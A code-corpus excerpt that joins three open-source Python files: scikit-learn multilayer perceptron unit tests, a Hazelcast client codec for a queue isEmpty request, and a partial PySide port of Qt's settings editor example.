# h2 = g(X2 * W_i2 + b12) = g(0.6 * 0.2 + 0.8 * 0.1 + 0.7 * 0 + 0.1)
# = 0.574442516811659
# o1 = g(h * W2 + b21) = g(0.679 * 0.1 + 0.574 * 0.2 + 1)
# = 0.7654329236196236
# d21 = -(0 - 0.765) = 0.765
# d11 = (1 - 0.679) * 0.679 * 0.765 * 0.1 = 0.01667
# d12 = (1 - 0.574) * 0.574 * 0.765 * 0.2 = 0.0374
# W1grad11 = X1 * d11 + alpha * W11 = 0.6 * 0.01667 + 0.1 * 0.1 = 0.0200
# W1grad11 = X1 * d12 + alpha * W12 = 0.6 * 0.0374 + 0.1 * 0.2 = 0.04244
# W1grad21 = X2 * d11 + alpha * W13 = 0.8 * 0.01667 + 0.1 * 0.3 = 0.043336
# W1grad22 = X2 * d12 + alpha * W14 = 0.8 * 0.0374 + 0.1 * 0.1 = 0.03992
# W1grad31 = X3 * d11 + alpha * W15 = 0.6 * 0.01667 + 0.1 * 0.5 = 0.060002
# W1grad32 = X3 * d12 + alpha * W16 = 0.6 * 0.0374 + 0.1 * 0 = 0.02244
# W2grad1 = h1 * d21 + alpha * W21 = 0.679 * 0.765 + 0.1 * 0.1 = 0.5294
# W2grad2 = h2 * d21 + alpha * W22 = 0.574 * 0.765 + 0.1 * 0.2 = 0.45911
# b1grad1 = d11 = 0.01667
# b1grad2 = d12 = 0.0374
# b2grad = d21 = 0.765
# W1 = W1 - eta * [W1grad11, .., W1grad32] = [[0.1, 0.2], [0.3, 0.1],
# [0.5, 0]] - 0.1 * [[0.0200, 0.04244], [0.043336, 0.03992],
# [0.060002, 0.02244]] = [[0.098, 0.195756], [0.2956664,
# 0.096008], [0.4939998, -0.002244]]
# W2 = W2 - eta * [W2grad1, W2grad2] = [[0.1], [0.2]] - 0.1 *
# [[0.5294], [0.45911]] = [[0.04706], [0.154089]]
# b1 = b1 - eta * [b1grad1, b1grad2] = 0.1 - 0.1 * [0.01667, 0.0374]
# = [0.098333, 0.09626]
# b2 = b2 - eta * b2grad = 1.0 - 0.1 * 0.765 = 0.9235
assert_almost_equal(mlp.coefs_[0], np.array([[0.098, 0.195756],
[0.2956664, 0.096008],
[0.4939998, -0.002244]]),
decimal=3)
assert_almost_equal(mlp.coefs_[1], np.array([[0.04706], [0.154089]]),
decimal=3)
assert_almost_equal(mlp.intercepts_[0],
np.array([0.098333, 0.09626]), decimal=3)
assert_almost_equal(mlp.intercepts_[1], np.array(0.9235), decimal=3)
# Testing output
# h1 = g(X1 * W_i1 + b11) = g(0.6 * 0.098 + 0.8 * 0.2956664 +
# 0.7 * 0.4939998 + 0.098333) = 0.677
# h2 = g(X2 * W_i2 + b12) = g(0.6 * 0.195756 + 0.8 * 0.096008 +
# 0.7 * -0.002244 + 0.09626) = 0.572
# o1 = h * W2 + b21 = 0.677 * 0.04706 +
# 0.572 * 0.154089 + 0.9235 = 1.043
# prob = sigmoid(o1) = 0.739
assert_almost_equal(mlp.predict_proba(X)[0, 1], 0.739, decimal=3)
def test_gradient():
# Test gradient.
# This makes sure that the activation functions and their derivatives
# are correct. The numerical and analytical computation of the gradient
# should be close.
for n_labels in [2, 3]:
n_samples = 5
n_features = 10
X = np.random.random((n_samples, n_features))
y = 1 + np.mod(np.arange(n_samples) + 1, n_labels)
Y = LabelBinarizer().fit_transform(y)
for activation in ACTIVATION_TYPES:
mlp = MLPClassifier(activation=activation, hidden_layer_sizes=10,
solver='lbfgs', alpha=1e-5,
learning_rate_init=0.2, max_iter=1,
random_state=1)
mlp.fit(X, y)
theta = np.hstack([l.ravel() for l in mlp.coefs_ +
mlp.intercepts_])
layer_units = ([X.shape[1]] + [mlp.hidden_layer_sizes] +
[mlp.n_outputs_])
activations = []
deltas = []
coef_grads = []
intercept_grads = []
activations.append(X)
for i in range(mlp.n_layers_ - 1):
activations.append(np.empty((X.shape[0],
layer_units[i + 1])))
deltas.append(np.empty((X.shape[0],
layer_units[i + 1])))
fan_in = layer_units[i]
fan_out = layer_units[i + 1]
coef_grads.append(np.empty((fan_in, fan_out)))
intercept_grads.append(np.empty(fan_out))
# analytically compute the gradients
def loss_grad_fun(t):
return mlp._loss_grad_lbfgs(t, X, Y, activations, deltas,
coef_grads, intercept_grads)
[value, grad] = loss_grad_fun(theta)
numgrad = np.zeros(np.size(theta))
n = np.size(theta, 0)
E = np.eye(n)
epsilon = 1e-5
# numerically compute the gradients
for i in range(n):
dtheta = E[:, i] * epsilon
numgrad[i] = ((loss_grad_fun(theta + dtheta)[0] -
loss_grad_fun(theta - dtheta)[0]) /
(epsilon * 2.0))
assert_almost_equal(numgrad, grad)
def test_lbfgs_classification():
# Test lbfgs on classification.
# It should achieve a score higher than 0.95 for the binary and multi-class
# versions of the digits dataset.
for X, y in classification_datasets:
X_train = X[:150]
y_train = y[:150]
X_test = X[150:]
expected_shape_dtype = (X_test.shape[0], y_train.dtype.kind)
for activation in ACTIVATION_TYPES:
mlp = MLPClassifier(solver='lbfgs', hidden_layer_sizes=50,
max_iter=150, shuffle=True, random_state=1,
activation=activation)
mlp.fit(X_train, y_train)
y_predict = mlp.predict(X_test)
assert_greater(mlp.score(X_train, y_train), 0.95)
assert_equal((y_predict.shape[0], y_predict.dtype.kind),
expected_shape_dtype)
def test_lbfgs_regression():
# Test lbfgs on the boston dataset, a regression problems.
X = Xboston
y = yboston
for activation in ACTIVATION_TYPES:
mlp = MLPRegressor(solver='lbfgs', hidden_layer_sizes=50,
max_iter=150, shuffle=True, random_state=1,
activation=activation)
mlp.fit(X, y)
if activation == 'identity':
assert_greater(mlp.score(X, y), 0.84)
else:
# Non linear models perform much better than linear bottleneck:
assert_greater(mlp.score(X, y), 0.95)
def test_learning_rate_warmstart():
# Tests that warm_start reuse past solutions.
X = [[3, 2], [1, 6], [5, 6], [-2, -4]]
y = [1, 1, 1, 0]
for learning_rate in ["invscaling", "constant"]:
mlp = MLPClassifier(solver='sgd', hidden_layer_sizes=4,
learning_rate=learning_rate, max_iter=1,
power_t=0.25, warm_start=True)
with ignore_warnings(category=ConvergenceWarning):
mlp.fit(X, y)
prev_eta = mlp._optimizer.learning_rate
mlp.fit(X, y)
post_eta = mlp._optimizer.learning_rate
if learning_rate == 'constant':
assert_equal(prev_eta, post_eta)
elif learning_rate == 'invscaling':
assert_equal(mlp.learning_rate_init / pow(8 + 1, mlp.power_t),
post_eta)
def test_multilabel_classification():
# Test that multi-label classification works as expected.
# test fit method
X, y = make_multilabel_classification(n_samples=50, random_state=0,
return_indicator=True)
mlp = MLPClassifier(solver='lbfgs', hidden_layer_sizes=50, alpha=1e-5,
max_iter=150, random_state=0, activation='logistic',
learning_rate_init=0.2)
mlp.fit(X, y)
assert_equal(mlp.score(X, y), 1)
# test partial fit method
mlp = MLPClassifier(solver='sgd', hidden_layer_sizes=50, max_iter=150,
random_state=0, activation='logistic', alpha=1e-5,
learning_rate_init=0.2)
for i in range(100):
mlp.partial_fit(X, y, classes=[0, 1, 2, 3, 4])
assert_greater(mlp.score(X, y), 0.9)
def test_multioutput_regression():
# Test that multi-output regression works as expected
X, y = make_regression(n_samples=200, n_targets=5)
mlp = MLPRegressor(solver='lbfgs', hidden_layer_sizes=50, max_iter=200,
random_state=1)
mlp.fit(X, y)
assert_greater(mlp.score(X, y), 0.9)
def test_partial_fit_classes_error():
# Tests that passing different classes to partial_fit raises an error
X = [[3, 2]]
y = [0]
clf = MLPClassifier(solver='sgd')
clf.partial_fit(X, y, classes=[0, 1])
assert_raises(ValueError, clf.partial_fit, X, y, classes=[1, 2])
def test_partial_fit_classification():
# Test partial_fit on classification.
# `partial_fit` should yield the same results as 'fit' for binary and
# multi-class classification.
for X, y in classification_datasets:
X = X
y = y
mlp = MLPClassifier(solver='sgd', max_iter=100, random_state=1,
tol=0, alpha=1e-5, learning_rate_init=0.2)
with ignore_warnings(category=ConvergenceWarning):
mlp.fit(X, y)
pred1 = mlp.predict(X)
mlp = MLPClassifier(solver='sgd', random_state=1, alpha=1e-5,
learning_rate_init=0.2)
for i in range(100):
mlp.partial_fit(X, y, classes=np.unique(y))
pred2 = mlp.predict(X)
assert_array_equal(pred1, pred2)
assert_greater(mlp.score(X, y), 0.95)
def test_partial_fit_unseen_classes():
# Non regression test for bug 6994
# Tests for labeling errors in partial fit
clf = MLPClassifier(random_state=0)
clf.partial_fit([[1], [2], [3]], ["a", "b", "c"],
classes=["a", "b", "c", "d"])
clf.partial_fit([[4]], ["d"])
assert_greater(clf.score([[1], [2], [3], [4]], ["a", "b", "c", "d"]), 0)
def test_partial_fit_regression():
# Test partial_fit on regression.
# `partial_fit` should yield the same results as 'fit' for regression.
X = Xboston
y = yboston
for momentum in [0, .9]:
mlp = MLPRegressor(solver='sgd', max_iter=100, activation='relu',
random_state=1, learning_rate_init=0.01,
batch_size=X.shape[0], momentum=momentum)
with warnings.catch_warnings(record=True):
# catch convergence warning
mlp.fit(X, y)
pred1 = mlp.predict(X)
mlp = MLPRegressor(solver='sgd', activation='relu',
learning_rate_init=0.01, random_state=1,
batch_size=X.shape[0], momentum=momentum)
for i in range(100):
mlp.partial_fit(X, y)
pred2 = mlp.predict(X)
assert_almost_equal(pred1, pred2, decimal=2)
score = mlp.score(X, y)
assert_greater(score, 0.75)
def test_partial_fit_errors():
# Test partial_fit error handling.
X = [[3, 2], [1, 6]]
y = [1, 0]
# no classes passed
assert_raises(ValueError,
MLPClassifier(solver='sgd').partial_fit, X, y, classes=[2])
# lbfgs doesn't support partial_fit
assert_false(hasattr(MLPClassifier(solver='lbfgs'), 'partial_fit'))
def test_params_errors():
# Test that invalid parameters raise value error
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier
assert_raises(ValueError, clf(hidden_layer_sizes=-1).fit, X, y)
assert_raises(ValueError, clf(max_iter=-1).fit, X, y)
assert_raises(ValueError, clf(shuffle='true').fit, X, y)
assert_raises(ValueError, clf(alpha=-1).fit, X, y)
assert_raises(ValueError, clf(learning_rate_init=-1).fit, X, y)
assert_raises(ValueError, clf(momentum=2).fit, X, y)
assert_raises(ValueError, clf(momentum=-0.5).fit, X, y)
assert_raises(ValueError, clf(nesterovs_momentum='invalid').fit, X, y)
assert_raises(ValueError, clf(early_stopping='invalid').fit, X, y)
assert_raises(ValueError, clf(validation_fraction=1).fit, X, y)
assert_raises(ValueError, clf(validation_fraction=-0.5).fit, X, y)
assert_raises(ValueError, clf(beta_1=1).fit, X, y)
assert_raises(ValueError, clf(beta_1=-0.5).fit, X, y)
assert_raises(ValueError, clf(beta_2=1).fit, X, y)
assert_raises(ValueError, clf(beta_2=-0.5).fit, X, y)
assert_raises(ValueError, clf(epsilon=-0.5).fit, X, y)
assert_raises(ValueError, clf(solver='hadoken').fit, X, y)
assert_raises(ValueError, clf(learning_rate='converge').fit, X, y)
assert_raises(ValueError, clf(activation='cloak').fit, X, y)
def test_predict_proba_binary():
# Test that predict_proba works as expected for binary class.
X = X_digits_binary[:50]
y = y_digits_binary[:50]
clf = MLPClassifier(hidden_layer_sizes=5)
with ignore_warnings(category=ConvergenceWarning):
clf.fit(X, y)
y_proba = clf.predict_proba(X)
y_log_proba = clf.predict_log_proba(X)
(n_samples, n_classes) = y.shape[0], 2
proba_max = y_proba.argmax(axis=1)
proba_log_max = y_log_proba.argmax(axis=1)
assert_equal(y_proba.shape, (n_samples, n_classes))
assert_array_equal(proba_max, proba_log_max)
assert_array_equal(y_log_proba, np.log(y_proba))
assert_equal(roc_auc_score(y, y_proba[:, 1]), 1.0)
def test_predict_proba_multiclass():
# Test that predict_proba works as expected for multi class.
X = X_digits_multi[:10]
y = y_digits_multi[:10]
clf = MLPClassifier(hidden_layer_sizes=5)
with ignore_warnings(category=ConvergenceWarning):
clf.fit(X, y)
y_proba = clf.predict_proba(X)
y_log_proba = clf.predict_log_proba(X)
(n_samples, n_classes) = y.shape[0], np.unique(y).size
proba_max = y_proba.argmax(axis=1)
proba_log_max = y_log_proba.argmax(axis=1)
assert_equal(y_proba.shape, (n_samples, n_classes))
assert_array_equal(proba_max, proba_log_max)
assert_array_equal(y_log_proba, np.log(y_proba))
def test_predict_proba_multilabel():
# Test that predict_proba works as expected for multilabel.
# Multilabel should not use softmax which makes probabilities sum to 1
X, Y = make_multilabel_classification(n_samples=50, random_state=0,
return_indicator=True)
n_samples, n_classes = Y.shape
clf = MLPClassifier(solver='lbfgs', hidden_layer_sizes=30,
random_state=0)
clf.fit(X, Y)
y_proba = clf.predict_proba(X)
assert_equal(y_proba.shape, (n_samples, n_classes))
assert_array_equal(y_proba > 0.5, Y)
y_log_proba = clf.predict_log_proba(X)
proba_max = y_proba.argmax(axis=1)
proba_log_max = y_log_proba.argmax(axis=1)
assert_greater((y_proba.sum(1) - 1).dot(y_proba.sum(1) - 1), 1e-10)
assert_array_equal(proba_max, proba_log_max)
assert_array_equal(y_log_proba, np.log(y_proba))
def test_sparse_matrices():
# Test that sparse and dense input matrices output the same results.
X = X_digits_binary[:50]
y = y_digits_binary[:50]
X_sparse = csr_matrix(X)
mlp = MLPClassifier(solver='lbfgs', hidden_layer_sizes=15,
random_state=1)
mlp.fit(X, y)
pred1 = mlp.predict(X)
mlp.fit(X_sparse, y)
pred2 = mlp.predict(X_sparse)
assert_almost_equal(pred1, pred2)
pred1 = mlp.predict(X)
pred2 = mlp.predict(X_sparse)
assert_array_equal(pred1, pred2)
def test_tolerance():
# Test tolerance.
# It should force the solver to exit the loop when it converges.
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier(tol=0.5, max_iter=3000, solver='sgd')
clf.fit(X, y)
assert_greater(clf.max_iter, clf.n_iter_)
def test_verbose_sgd():
# Test verbose.
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier(solver='sgd', max_iter=2, verbose=10,
hidden_layer_sizes=2)
old_stdout = sys.stdout
sys.stdout = output = StringIO()
with ignore_warnings(category=ConvergenceWarning):
clf.fit(X, y)
clf.partial_fit(X, y)
sys.stdout = old_stdout
assert 'Iteration' in output.getvalue()
def test_early_stopping():
X = X_digits_binary[:100]
y = y_digits_binary[:100]
tol = 0.2
clf = MLPClassifier(tol=tol, max_iter=3000, solver='sgd',
early_stopping=True)
clf.fit(X, y)
assert_greater(clf.max_iter, clf.n_iter_)
valid_scores = clf.validation_scores_
best_valid_score = clf.best_validation_score_
assert_equal(max(valid_scores), best_valid_score)
assert_greater(best_valid_score + tol, valid_scores[-2])
assert_greater(best_valid_score + tol, valid_scores[-1])
def test_adaptive_learning_rate():
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier(tol=0.5, max_iter=3000, solver='sgd',
learning_rate='adaptive')
clf.fit(X, y)
assert_greater(clf.max_iter, clf.n_iter_)
assert_greater(1e-6, clf._optimizer.learning_rate)
@ignore_warnings(category=RuntimeWarning)
def test_warm_start():
X = X_iris
y = y_iris
y_2classes = np.array([0] * 75 + [1] * 75)
y_3classes = np.array([0] * 40 + [1] * 40 + [2] * 70)
y_3classes_alt = np.array([0] * 50 + [1] * 50 + [3] * 50)
y_4classes = np.array([0] * 37 + [1] * 37 + [2] * 38 + [3] * 38)
y_5classes = np.array([0] * 30 + [1] * 30 + [2] * 30 + [3] * 30 + [4] * 30)
# No error raised
clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs',
warm_start=True).fit(X, y)
clf.fit(X, y)
clf.fit(X, y_3classes)
for y_i in (y_2classes, y_3classes_alt, y_4classes, y_5classes):
clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs',
warm_start=True).fit(X, y)
message = ('warm_start can only be used where `y` has the same '
'classes as in the previous call to fit.'
' Previously got [0 1 2], `y` has %s' % np.unique(y_i))
assert_raise_message(ValueError, message, clf.fit, X, y_i)
|
mbayon/TFG-MachineLearning
|
venv/lib/python3.6/site-packages/sklearn/neural_network/tests/test_mlp.py
|
Python
|
mit
| 22,194
|
from hazelcast.serialization.bits import *
from hazelcast.protocol.client_message import ClientMessage
from hazelcast.protocol.custom_codec import *
from hazelcast.util import ImmutableLazyDataList
from hazelcast.protocol.codec.queue_message_type import *
REQUEST_TYPE = QUEUE_ISEMPTY
RESPONSE_TYPE = 101
RETRYABLE = False
def calculate_size(name):
""" Calculates the request payload size"""
data_size = 0
data_size += calculate_size_str(name)
return data_size
def encode_request(name):
""" Encode request into client_message"""
client_message = ClientMessage(payload_size=calculate_size(name))
client_message.set_message_type(REQUEST_TYPE)
client_message.set_retryable(RETRYABLE)
client_message.append_str(name)
client_message.update_frame_length()
return client_message
def decode_response(client_message, to_object=None):
""" Decode response from client message"""
parameters = dict(response=None)
parameters['response'] = client_message.read_bool()
return parameters
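# Illustrative round trip (sketch; transport and names outside this module
# are assumed):
#   request = encode_request("my-queue")   # ClientMessage ready to send
#   ...send it, read the reply into `reply_message`...
#   decode_response(reply_message)         # -> {'response': True or False}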
|
cangencer/hazelcast-python-client
|
hazelcast/protocol/codec/queue_is_empty_codec.py
|
Python
|
apache-2.0
| 1,041
|
#!/usr/bin/env python
"""PyQt4 port of the tools/settingseditor example from Qt v4.x"""
import sys
from PySide import QtCore, QtGui
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.settingsTree = SettingsTree()
self.setCentralWidget(self.settingsTree)
self.locationDialog = None
self.createActions()
self.createMenus()
self.autoRefreshAct.setChecked(True)
self.fallbacksAct.setChecked(True)
self.setWindowTitle("Settings Editor")
self.resize(500, 600)
def openSettings(self):
if self.locationDialog is None:
self.locationDialog = LocationDialog(self)
if self.locationDialog.exec_():
settings = QtCore.QSettings(self.locationDialog.format(),
self.locationDialog.scope(),
self.locationDialog.organization(),
self.locationDialog.application())
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(True)
def openIniFile(self):
fileName, _ = QtGui.QFileDialog.getOpenFileName(self, "Open INI File",
'', "INI Files (*.ini *.conf)")
if fileName:
settings = QtCore.QSettings(fileName, QtCore.QSettings.IniFormat)
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(False)
def openPropertyList(self):
fileName, _ = QtGui.QFileDialog.getOpenFileName(self,
"Open Property List", '', "Property List Files (*.plist)")
if fileName:
settings = QtCore.QSettings(fileName, QtCore.QSettings.NativeFormat)
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(False)
def openRegistryPath(self):
path, ok = QtGui.QInputDialog.getText(self, "Open Registry Path",
"Enter the path in the Windows registry:",
QtGui.QLineEdit.Normal, 'HKEY_CURRENT_USER\\')
if ok and path != '':
settings = QtCore.QSettings(path, QtCore.QSettings.NativeFormat)
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(False)
def about(self):
QtGui.QMessageBox.about(self, "About Settings Editor",
"The <b>Settings Editor</b> example shows how to access "
"application settings using Qt.")
def createActions(self):
self.openSettingsAct = QtGui.QAction("&Open Application Settings...",
self, shortcut="Ctrl+O", triggered=self.openSettings)
self.openIniFileAct = QtGui.QAction("Open I&NI File...", self,
shortcut="Ctrl+N", triggered=self.openIniFile)
self.openPropertyListAct = QtGui.QAction("Open Mac &Property List...",
self, shortcut="Ctrl+P", triggered=self.openPropertyList)
if sys.platform != 'darwin':
self.openPropertyListAct.setEnabled(False)
self.openRegistryPathAct = QtGui.QAction(
"Open Windows &Registry Path...", self, shortcut="Ctrl+G",
triggered=self.openRegistryPath)
if sys.platform != 'win32':
self.openRegistryPathAct.setEnabled(False)
self.refreshAct = QtGui.QAction("&Refresh", self, shortcut="Ctrl+R",
enabled=False, triggered=self.settingsTree.refresh)
self.exitAct = QtGui.QAction("E&xit", self, shortcut="Ctrl+Q",
triggered=self.close)
self.autoRefreshAct = QtGui.QAction("&Auto-Refresh", self,
shortcut="Ctrl+A", checkable=True, enabled=False)
self.autoRefreshAct.triggered[bool].connect(self.settingsTree.setAutoRefresh)
self.autoRefreshAct.triggered[bool].connect(self.refreshAct.setDisabled)
self.fallbacksAct = QtGui.QAction("&Fallbacks", self,
shortcut="Ctrl+F", checkable=True, enabled=False)
self.fallbacksAct.triggered[bool].connect(self.settingsTree.setFallbacksEnabled)
self.aboutAct = QtGui.QAction("&About", self, triggered=self.about)
self.aboutQtAct = QtGui.QAction("About &Qt", self,
triggered=QtGui.qApp.aboutQt)
def createMenus(self):
self.fileMenu = self.menuBar().addMenu("&File")
self.fileMenu.addAction(self.openSettingsAct)
self.fileMenu.addAction(self.openIniFileAct)
self.fileMenu.addAction(self.openPropertyListAct)
self.fileMenu.addAction(self.openRegistryPathAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.refreshAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.exitAct)
self.optionsMenu = self.menuBar().addMenu("&Options")
self.optionsMenu.addAction(self.autoRefreshAct)
self.optionsMenu.addAction(self.fallbacksAct)
self.menuBar().addSeparator()
self.helpMenu = self.menuBar().addMenu("&Help")
self.helpMenu.addAction(self.aboutAct)
self.helpMenu.addAction(self.aboutQtAct)
def setSettingsObject(self, settings):
settings.setFallbacksEnabled(self.fallbacksAct.isChecked())
self.settingsTree.setSettingsObject(settings)
self.refreshAct.setEnabled(True)
self.autoRefreshAct.setEnabled(True)
niceName = settings.fileName()
niceName.replace('\\', '/')
niceName = niceName.split('/')[-1]
if not settings.isWritable():
niceName += " (read only)"
self.setWindowTitle("%s - Settings Editor" % niceName)
class LocationDialog(QtGui.QDialog):
def __init__(self, parent=None):
super(LocationDialog, self).__init__(parent)
self.formatComboBox = QtGui.QComboBox()
self.formatComboBox.addItem("Native")
self.formatComboBox.addItem("INI")
self.scopeComboBox = QtGui.QComboBox()
self.scopeComboBox.addItem("User")
self.scopeComboBox.addItem("System")
self.organizationComboBox = QtGui.QComboBox()
self.organizationComboBox.addItem("Trolltech")
self.organizationComboBox.setEditable(True)
self.applicationComboBox = QtGui.QComboBox()
self.applicationComboBox.addItem("Any")
self.applicationComboBox.addItem("Application Example")
self.applicationComboBox.addItem("Assistant")
self.applicationComboBox.addItem("Designer")
self.applicationComboBox.addItem("Linguist")
self.applicationComboBox.setEditable(True)
self.applicationComboBox.setCurrentIndex(3)
formatLabel = QtGui.QLabel("&Format:")
formatLabel.setBuddy(self.formatComboBox)
scopeLabel = QtGui.QLabel("&Scope:")
scopeLabel.setBuddy(self.scopeComboBox)
organizationLabel = QtGui.QLabel("&Organization:")
organizationLabel.setBuddy(self.organizationComboBox)
applicationLabel = QtGui.QLabel("&Application:")
applicationLabel.setBuddy(self.applicationComboBox)
self.locationsGroupBox = QtGui.QGroupBox("Setting Locations")
self.locationsTable = QtGui.QTableWidget()
self.locationsTable.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
self.locationsTable.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.locationsTable.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.locationsTable.setColumnCount(2)
self.locationsTable.setHorizontalHeaderLabels(("Location", "Access"))
self.locationsTable.horizontalHeader().setResizeMode(0, QtGui.QHeaderView.Stretch)
self.locationsTable.horizontalHeader().resizeSection(1, 180)
self.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)
self.formatComboBox.activated.connect(self.updateLocationsTable)
self.scopeComboBox.activated.connect(self.updateLocationsTable)
self.organizationComboBox.lineEdit().editingFinished.connect(self.updateLocationsTable)
self.applicationComboBox.lineEdit().editingFinished.connect(self.updateLocationsTable)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
locationsLayout = QtGui.QVBoxLayout()
locationsLayout.addWidget(self.locationsTable)
self.locationsGroupBox.setLayout(locationsLayout)
mainLayout = QtGui.QGridLayout()
mainLayout.addWidget(formatLabel, 0, 0)
mainLayout.addWidget(self.formatComboBox, 0, 1)
mainLayout.addWidget(scopeLabel, 1, 0)
mainLayout.addWidget(self.scopeComboBox, 1, 1)
mainLayout.addWidget(organizationLabel, 2, 0)
mainLayout.addWidget(self.organizationComboBox, 2, 1)
mainLayout.addWidget(applicationLabel, 3, 0)
mainLayout.addWidget(self.applicationComboBox, 3, 1)
mainLayout.addWidget(self.locationsGroupBox, 4, 0, 1, 2)
mainLayout.addWidget(self.buttonBox, 5, 0, 1, 2)
self.setLayout(mainLayout)
self.updateLocationsTable()
self.setWindowTitle("Open Application Settings")
self.resize(650, 400)
def format(self):
if self.formatComboBox.currentIndex() == 0:
return QtCore.QSettings.NativeFormat
else:
return QtCore.QSettings.IniFormat
def scope(self):
if self.scopeComboBox.currentIndex() == 0:
return QtCore.QSettings.UserScope
else:
return QtCore.QSettings.SystemScope
def organization(self):
return self.organizationComboBox.currentText()
def application(self):
if self.applicationComboBox.currentText() == "Any":
return ''
return self.applicationComboBox.currentText()
def updateLocationsTable(self):
self.locationsTable.setUpdatesEnabled(False)
self.locationsTable.setRowCount(0)
for i in range(2):
if i == 0:
if self.scope() == QtCore.QSettings.SystemScope:
continue
actualScope = QtCore.QSettings.UserScope
else:
actualScope = QtCore.QSettings.SystemScope
for j in range(2):
if j == 0:
if not self.application():
continue
actualApplication = self.application()
else:
actualApplication = ''
settings = QtCore.QSettings(self.format(), actualScope,
self.organization(), actualApplication)
row = self.locationsTable.rowCount()
self.locationsTable.setRowCount(row + 1)
item0 = QtGui.QTableWidgetItem()
item0.setText(settings.fileName())
item1 = QtGui.QTableWidgetItem()
disable = not (settings.childKeys() or settings.childGroups())
if row == 0:
if settings.isWritable():
item1.setText("Read-write")
disable = False
else:
item1.setText("Read-only")
self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setDisabled(disable)
else:
item1.setText("Read-only fallback")
if disable:
item0.setFlags(item0.flags() & ~QtCore.Qt.ItemIsEnabled)
item1.setFlags(item1.flags() & ~QtCore.Qt.ItemIsEnabled)
self.locationsTable.setItem(row, 0, item0)
self.locationsTable.setItem(row, 1, item1)
self.locationsTable.setUpdatesEnabled(True)
class SettingsTree(QtGui.QTreeWidget):
def __init__(self, parent=None):
super(SettingsTree, self).__init__(parent)
self.setItemDelegate(VariantDelegate(self))
self.setHeaderLabels(("Setting", "Type", "Value"))
self.header().setResizeMode(0, QtGui.QHeaderView.Stretch)
self.header().setResizeMode(2, QtGui.QHeaderView.Stretch)
self.settings = None
self.refreshTimer = QtCore.QTimer()
self.refreshTimer.setInterval(2000)
self.autoRefresh = False
self.groupIcon = QtGui.QIcon()
self.groupIcon.addPixmap(self.style().standardPixmap(QtGui.QStyle.SP_DirClosedIcon),
QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.groupIcon.addPixmap(self.style().standardPixmap(QtGui.QStyle.SP_DirOpenIcon),
QtGui.QIcon.Normal, QtGui.QIcon.On)
self.keyIcon = QtGui.QIcon()
self.keyIcon.addPixmap(self.style().standardPixmap(QtGui.QStyle.SP_FileIcon))
self.refreshTimer.timeout.connect(self.maybeRefresh)
def setSettingsObject(self, settings):
self.settings = settings
self.clear()
if self.settings is not None:
self.settings.setParent(self)
self.refresh()
if self.autoRefresh:
self.refreshTimer.start()
else:
self.refreshTimer.stop()
def sizeHint(self):
return QtCore.QSize(800, 600)
def setAutoRefresh(self, autoRefresh):
self.autoRefresh = autoRefresh
if self.settings is not None:
if self.autoRefresh:
self.maybeRefresh()
self.refreshTimer.start()
else:
self.refreshTimer.stop()
def setFallbacksEnabled(self, enabled):
if self.settings is not None:
self.settings.setFallbacksEnabled(enabled)
self.refresh()
def maybeRefresh(self):
if self.state() != QtGui.QAbstractItemView.EditingState:
self.refresh()
def refresh(self):
if self.settings is None:
return
# The signal might not be connected.
try:
self.itemChanged.disconnect(self.updateSetting)
except:
pass
self.settings.sync()
self.updateChildItems(None)
self.itemChanged.connect(self.updateSetting)
def event(self, event):
if event.type() == QtCore.QEvent.WindowActivate:
if self.isActiveWindow() and self.autoRefresh:
self.maybeRefresh()
return super(SettingsTree, self).event(event)
def updateSetting(self, item):
key = item.text(0)
ancestor = item.parent()
while ancestor:
key = ancestor.text(0) + '/' + key
ancestor = ancestor.parent()
        d = item.data(2, QtCore.Qt.UserRole)
        self.settings.setValue(key, d)
if self.autoRefresh:
self.refresh()
def updateChildItems(self, parent):
dividerIndex = 0
for group in self.settings.childGroups():
childIndex = self.findChild(parent, group, dividerIndex)
if childIndex != -1:
child = self.childAt(parent, childIndex)
child.setText(1, '')
child.setText(2, '')
child.setData(2, QtCore.Qt.UserRole, None)
self.moveItemForward(parent, childIndex, dividerIndex)
else:
child = self.createItem(group, parent, dividerIndex)
child.setIcon(0, self.groupIcon)
dividerIndex += 1
self.settings.beginGroup(group)
self.updateChildItems(child)
self.settings.endGroup()
for key in self.settings.childKeys():
childIndex = self.findChild(parent, key, 0)
if childIndex == -1 or childIndex >= dividerIndex:
if childIndex != -1:
child = self.childAt(parent, childIndex)
for i in range(child.childCount()):
self.deleteItem(child, i)
self.moveItemForward(parent, childIndex, dividerIndex)
else:
child = self.createItem(key, parent, dividerIndex)
child.setIcon(0, self.keyIcon)
dividerIndex += 1
else:
child = self.childAt(parent, childIndex)
value = self.settings.value(key)
if value is None:
child.setText(1, 'Invalid')
else:
child.setText(1, value.__class__.__name__)
child.setText(2, VariantDelegate.displayText(value))
child.setData(2, QtCore.Qt.UserRole, value)
while dividerIndex < self.childCount(parent):
self.deleteItem(parent, dividerIndex)
def createItem(self, text, parent, index):
after = None
if index != 0:
after = self.childAt(parent, index - 1)
if parent is not None:
item = QtGui.QTreeWidgetItem(parent, after)
else:
item = QtGui.QTreeWidgetItem(self, after)
item.setText(0, text)
item.setFlags(item.flags() | QtCore.Qt.ItemIsEditable)
return item
def deleteItem(self, parent, index):
if parent is not None:
item = parent.takeChild(index)
else:
item = self.takeTopLevelItem(index)
del item
def childAt(self, parent, index):
if parent is not None:
return parent.child(index)
else:
return self.topLevelItem(index)
